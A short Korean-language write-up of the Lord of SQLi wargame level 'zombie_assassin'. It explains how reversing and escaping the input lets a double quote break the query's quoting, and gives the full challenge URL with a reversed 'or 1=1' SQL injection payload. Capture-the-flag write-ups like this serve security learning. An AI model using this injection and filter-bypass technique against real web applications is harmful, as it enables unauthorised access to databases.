17. LOS - zombie_assassin

해당 문자에서는

strrev() --> 문자열 뒤집기

addslashes --> \ 추가

필터링이 들어가있다.

select id from prob_zombie_assassin where id='' and pw=''

쿼리에서 id에 "를 넣어주게 되면

query :select id from prob_zombie_assassin where id='"\' and pw=''

처럼 처리가 된다.

그러면

id=("\' and pw = ) 까지를 id로 인식하기 때문에 뒤에 or 1=1 -- - 넣어주면 된다.

los.rubiya.kr/chall/zombie_assassin_eac7521e07fe5f298301a44b61ffeec0.php?id=%22&pw=%20-%20--1=1%20%20ro

뒤집어서 넣어줘야하는거 잊으시면 안됩니다.